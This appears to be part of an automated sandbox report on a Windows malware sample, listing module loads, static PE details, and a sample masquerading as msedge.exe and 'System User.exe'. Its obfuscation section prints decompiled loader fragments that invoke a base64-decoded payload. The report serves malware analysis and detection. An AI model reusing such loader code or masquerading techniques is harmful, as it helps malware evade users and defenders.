                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Section loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Section loaded: schannel.dll
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Section loaded: mskeyprotect.dll
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Section loaded: ntasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Section loaded: ncrypt.dll
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Section loaded: ncryptsslp.dll
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Section loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Section loaded: gpapi.dll
                      Source: C:\Windows\System32\ipconfig.exe | Section loaded: iphlpapi.dll
                      Source: C:\Windows\System32\ipconfig.exe | Section loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\ipconfig.exe | Section loaded: dhcpcsvc6.dll
                      Source: C:\Windows\System32\ipconfig.exe | Section loaded: dnsapi.dll
                      Source: C:\Windows\System32\ipconfig.exe | Section loaded: winnsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\System User.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                      Source: YgJ5inWPQO.exeStatic PE information: Image base 0x140000000 > 0x60000000
                      Source: YgJ5inWPQO.exeStatic file information: File size 7714025 > 1048576
                      Source: YgJ5inWPQO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: YgJ5inWPQO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: YgJ5inWPQO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: YgJ5inWPQO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: YgJ5inWPQO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: YgJ5inWPQO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: YgJ5inWPQO.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                      Source: YgJ5inWPQO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: YgJ5inWPQO.exe, 00000000.00000003.1471950558.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: YgJ5inWPQO.exe, 00000000.00000003.1472115949.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: YgJ5inWPQO.exe, 00000000.00000003.1464730716.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\System.pdbI source: dddd.exe, 0000000E.00000002.1744595376.000002624C77F000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: dddd.exe, 0000000E.00000002.1731703513.0000026234332000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: YgJ5inWPQO.exe, 00000000.00000003.1464879729.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: dddd.exe, 0000000E.00000002.1744595376.000002624C710000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: YgJ5inWPQO.exe, 00000000.00000003.1464879729.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: YgJ5inWPQO.exe, 00000000.00000003.1463949860.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1507721671.00007FFBBB63D000.00000002.00000001.01000000.00000006.sdmp
                      Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: YgJ5inWPQO.exe, 00000000.00000003.1463734787.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmp
                      Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: YgJ5inWPQO.exe, 00000000.00000003.1463734787.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: YgJ5inWPQO.exe, 00000000.00000003.1465060554.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\python313.pdb source: YgJ5inWPQO.exe, 00000002.00000002.1499325131.00007FFBAACA9000.00000002.00000001.01000000.00000004.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: dddd.exe, 0000000E.00000002.1744595376.000002624C7A1000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.pdb source: dddd.exe, 0000000E.00000002.1731703513.0000026234332000.00000004.00000800.00020000.00000000.sdmp
                      Source: YgJ5inWPQO.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: YgJ5inWPQO.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: YgJ5inWPQO.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: YgJ5inWPQO.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: YgJ5inWPQO.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                      Data Obfuscation

                      Source: msedge.exe.2.dr, VtuFYKkWuY1PI9BLhv1ksGbAvUhLDZmtE93hWySfiP39HcMYveO0HxCdT6CIPx7oMr8o8LBMU51eJGML.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_0fMQz1adjSFKPgcLs2KfNWsL1qDjoRJ254KgG47NkBGFlkHX.JqVuYg6hxaBUVcsdVfq2EcFAGccAALAx6cfCplGgUYZBCMgZ,_0fMQz1adjSFKPgcLs2KfNWsL1qDjoRJ254KgG47NkBGFlkHX._9U7OSAq0RXDPzWAZjnggVkY6KqaW8cEJGr3VqC6YPwEJiLQu,_0fMQz1adjSFKPgcLs2KfNWsL1qDjoRJ254KgG47NkBGFlkHX.m5CbZCym8joy9FHkIHwTq3Abm67Rn11rdkK3Mm05MdF6FmPJ,_0fMQz1adjSFKPgcLs2KfNWsL1qDjoRJ254KgG47NkBGFlkHX.eBo3ZLkgXek59acgYzOPhGatYL2GzfbBwmHN7fnlTJYIsq4G,_3dgQ4sLORTEz8Prkm60ulWACIXjwJ7c6mrCcGNf2MvuZdnTw9FZ0qRPg2U86pBEnH.qJPD6VozMzwU00SkOvlrAxbO1xXiBnr9CJYEOhfpofh3s4nRMuIi0qdgXAeQfcmp5HrP5QWtcP8mTPYuZNVTSOZxVsA6sB0CE0()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: msedge.exe.2.dr, VtuFYKkWuY1PI9BLhv1ksGbAvUhLDZmtE93hWySfiP39HcMYveO0HxCdT6CIPx7oMr8o8LBMU51eJGML.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{UE0TPOEfEtXYb36upxT4ctn2b3a6f3yd32a9sAIWHZakmlowGwIs0Qb78SQdgpgO3[2],_3dgQ4sLORTEz8Prkm60ulWACIXjwJ7c6mrCcGNf2MvuZdnTw9FZ0qRPg2U86pBEnH.awtX9wwH9SKzlYTJgmPpqssvVZpVHXTwSNAIlhI0ArefAyH1phkJcYETo4nSdcIpBj9bIoqVMIftQAfrAVj0TglYcljvX3d21W(Convert.FromBase64String(UE0TPOEfEtXYb36upxT4ctn2b3a6f3yd32a9sAIWHZakmlowGwIs0Qb78SQdgpgO3[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.6.raw.unpack, VtuFYKkWuY1PI9BLhv1ksGbAvUhLDZmtE93hWySfiP39HcMYveO0HxCdT6CIPx7oMr8o8LBMU51eJGML.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_0fMQz1adjSFKPgcLs2KfNWsL1qDjoRJ254KgG47NkBGFlkHX.JqVuYg6hxaBUVcsdVfq2EcFAGccAALAx6cfCplGgUYZBCMgZ,_0fMQz1adjSFKPgcLs2KfNWsL1qDjoRJ254KgG47NkBGFlkHX._9U7OSAq0RXDPzWAZjnggVkY6KqaW8cEJGr3VqC6YPwEJiLQu,_0fMQz1adjSFKPgcLs2KfNWsL1qDjoRJ254KgG47NkBGFlkHX.m5CbZCym8joy9FHkIHwTq3Abm67Rn11rdkK3Mm05MdF6FmPJ,_0fMQz1adjSFKPgcLs2KfNWsL1qDjoRJ254KgG47NkBGFlkHX.eBo3ZLkgXek59acgYzOPhGatYL2GzfbBwmHN7fnlTJYIsq4G,_3dgQ4sLORTEz8Prkm60ulWACIXjwJ7c6mrCcGNf2MvuZdnTw9FZ0qRPg2U86pBEnH.qJPD6VozMzwU00SkOvlrAxbO1xXiBnr9CJYEOhfpofh3s4nRMuIi0qdgXAeQfcmp5HrP5QWtcP8mTPYuZNVTSOZxVsA6sB0CE0()}}, (string[])null, (Type[])null, (bool[])null, true)
